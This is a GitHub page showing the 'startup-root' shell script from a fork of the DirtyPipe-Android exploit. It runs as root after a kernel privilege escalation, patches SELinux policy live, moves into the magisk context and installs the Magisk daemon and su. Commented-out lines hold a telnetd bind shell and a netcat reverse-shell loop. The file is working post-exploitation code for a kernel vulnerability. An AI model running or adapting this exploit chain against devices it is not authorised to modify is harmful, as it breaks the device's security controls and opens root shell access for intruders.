forked from polygraphene/DirtyPipe-Android
-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathstartup-root
149 lines (116 loc) · 6.78 KB
/
startup-root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
#!/system/bin/sh
# Called from modprobe-payload
# Now in root user + permissive domain (u:r:vendor_modprobe:s0)
BASE_DIR=$(readlink -f $(dirname $0))
if [ -z "$1" ]; then
log=$BASE_DIR/root-log1
# BOOTCLASSPATH is required for magiskd
export ANDROID_DATA=/data
export ANDROID_ART_ROOT=/apex/com.android.art
export ANDROID_TZDATA_ROOT=/apex/com.android.tzdata
export SYSTEMSERVERCLASSPATH=/system/framework/com.android.location.provider.jar:/system/framework/services.jar:/system/framework/ethernet-service.jar:/apex/com.android.appsearch/javalib/service-appsearch.jar:/apex/com.android.media/javalib/service-media-s.jar:/apex/com.android.permission/javalib/service-permission.jar
export TERM=xterm-256color
export ANDROID_SOCKET_adbd=23
export ANDROID_STORAGE=/storage
export EXTERNAL_STORAGE=/sdcard
export DOWNLOAD_CACHE=/data/cache
export ANDROID_ASSETS=/system/app
export STANDALONE_SYSTEMSERVER_JARS=
export DEX2OATBOOTCLASSPATH=/apex/com.android.art/javalib/core-oj.jar:/apex/com.android.art/javalib/core-libart.jar:/apex/com.android.art/javalib/okhttp.jar:/apex/com.android.art/javalib/bouncycastle.jar:/apex/com.android.art/javalib/apache-xml.jar:/system/framework/framework.jar:/system/framework/framework-graphics.jar:/system/framework/ext.jar:/system/framework/telephony-common.jar:/system/framework/voip-common.jar:/system/framework/ims-common.jar:/apex/com.android.i18n/javalib/core-icu4j.jar
export BOOTCLASSPATH=/apex/com.android.art/javalib/core-oj.jar:/apex/com.android.art/javalib/core-libart.jar:/apex/com.android.art/javalib/okhttp.jar:/apex/com.android.art/javalib/bouncycastle.jar:/apex/com.android.art/javalib/apache-xml.jar:/system/framework/framework.jar:/system/framework/framework-graphics.jar:/system/framework/ext.jar:/system/framework/telephony-common.jar:/system/framework/voip-common.jar:/system/framework/ims-common.jar:/apex/com.android.i18n/javalib/core-icu4j.jar:/apex/com.android.appsearch/javalib/framework-appsearch.jar:/apex/com.android.conscrypt/javalib/conscrypt.jar:/apex/com.android.ipsec/javalib/android.net.ipsec.ike.jar:/apex/com.android.media/javalib/updatable-media.jar:/apex/com.android.mediaprovider/javalib/framework-mediaprovider.jar:/apex/com.android.os.statsd/javalib/framework-statsd.jar:/apex/com.android.permission/javalib/framework-permission.jar:/apex/com.android.permission/javalib/framework-permission-s.jar:/apex/com.android.scheduling/javalib/framework-scheduling.jar:/apex/com.android.sdkext/javalib/framework-sdkextensions.jar:/apex/com.android.tethering/javalib/framework-connectivity.jar:/apex/com.android.tethering/javalib/framework-tethering.jar:/apex/com.android.wifi/javalib/framework-wifi.jar
export SHELL=/bin/sh
export ANDROID_BOOTLOGO=1
export ASEC_MOUNTPOINT=/mnt/asec
export HOSTNAME=oriole
export TMPDIR=/data/local/tmp
export ANDROID_ROOT=/system
export ANDROID_I18N_ROOT=/apex/com.android.i18n
export USER=root
export PATH=/data/local/tmp/bin:/dev/.magisk:/product/bin:/apex/com.android.runtime/bin:/apex/com.android.art/bin:/system_ext/bin:/system/bin:/system/xbin:/odm/bin:/vendor/bin:/vendor/xbin
export HOME=$BASE_DIR
# Sometimes unstable behaviors like EACCESS on accessing file happen.
# It may be caused by cache of old selinux policy.
# Wait for flush of the cache.
# TODO: Fix kernel module to flush cache manually.
for i in `seq 1 100`; do
rm $log
result1=$?
touch $log
result2=$?
if [ $result1 = 0 -a $result2 = 0 ]; then
echo Successfully access log. Try=$i > $log
break
fi
sleep 1
done
echo Start startup-root. BASE_DIR=$BASE_DIR >> $log
#$BASE_DIR/magiskpolicy --save $BASE_DIR/policy-dump
ln -s $BASE_DIR/magisk/magiskinit $BASE_DIR/magisk/magiskpolicy 2>> $log
chmod 755 $BASE_DIR/magisk/magiskinit $BASE_DIR/magisk/magisk $BASE_DIR/magisk/busybox
$BASE_DIR/magisk/magiskpolicy --magisk --live 2>> $log
echo u:r:magisk:s0 > /proc/self/attr/current
echo `date`: `id` >> $log
# Send completion signal to restore files
$BASE_DIR/magisk/busybox killall -s SIGUSR1 dirtypipe-android
# INSECURE
# $BASE_DIR/magisk/busybox telnetd -l /bin/sh -p 10848 &
# Reverse shell: A little safer
#HOST=127.0.0.1
#PORT=10847
#sleep 1
#FIFO=$BASE_DIR/reverse-fifo
#
#rm -f $FIFO
#mkfifo $FIFO
#cat $FIFO | /system/bin/sh -i 2>&1|$BASE_DIR/magisk/busybox nc $HOST $PORT > $FIFO
# Experimental Magisk root access.
# Avoid error: 'CANNOT LINK EXECUTABLE "/system/bin/app_process64": library "libnativeloader.so" not found: needed by main executable'
# startup-root is launched in bootstrap mount namespace. It prevent app_process from launch. Pull default ns from init to avoid it.
# I don't know why we are in bootstrap mount ns even though we forked from init.
$BASE_DIR/magisk/busybox nsenter -t 1 -m $0 magisk > $BASE_DIR/mylog2 2>&1 < /dev/null
else
#set -e
id
$BASE_DIR/env-patcher || true
# Credit: https://github.com/j4nn/CVE-2020-0041/blob/v50g8-mroot/scripts/magisk-start.sh
killall -KILL magiskd || true
#./magiskpolicy --live --magisk "allow shell * * *"
# Stuck until screen is unlocked?
pm install -r $BASE_DIR/magisk/Magisk-v24.3.apk > /dev/null 2>&1 < /dev/null || true
M=/dev/.magisk
umount $M || true
mkdir $M 2> /dev/null || true
mount -t tmpfs none $M
cp $BASE_DIR/magisk/* $M || true
cd $M
chcon u:object_r:magisk_file:s0 /dev/.magisk
chcon u:object_r:magisk_file:s0 /dev/.magisk/*
chmod 755 /dev/.magisk /dev/.magisk/*
for i in su resetprop ; do ln -s $M/magisk $M/$i ; done
mkdir $M/.magisk
chmod 755 $M/.magisk
echo "KEEPVERITY=true" > $M/.magisk/config
echo "KEEPFORCEENCRYPT=true" >> $M/.magisk/config
chmod 000 $M/.magisk/config
mkdir -p /data/adb/magisk
chmod 700 /data/adb
chmod -R 755 /data/adb/magisk
chown -R root:root /data/adb/magisk
mkdir -p $M/.magisk/busybox ; chmod 755 $M/.magisk/busybox
mv busybox $M/.magisk/busybox
#$M/.magisk/busybox/busybox --install -s $M/.magisk/busybox
mkdir -p $M/.magisk/mirror ; chmod 000 $M/.magisk/mirror
mkdir -p $M/.magisk/block ; chmod 000 $M/.magisk/block
mkdir -p $M/.magisk/modules ; chmod 755 $M/.magisk/modules
#ln -s $M/.magisk/modules $M/.magisk/img
mkdir -p /data/adb/modules ; chmod 755 /data/adb/modules
mkdir -p /data/adb/post-fs-data.d ; chmod 755 /data/adb/post-fs-data.d
mkdir -p /data/adb/service.d ; chmod 755 /data/adb/service.d
#$M/magisk --restorecon
chcon -R -h u:object_r:rootfs:s0 $M/.magisk
chcon u:object_r:magisk_file:s0 $M/.magisk/busybox/busybox
$M/magisk --daemon
chmod 755 $M
#chcon u:object_r:system_file:s0 $M/magisk
#chcon u:object_r:system_file:s0 $M
fi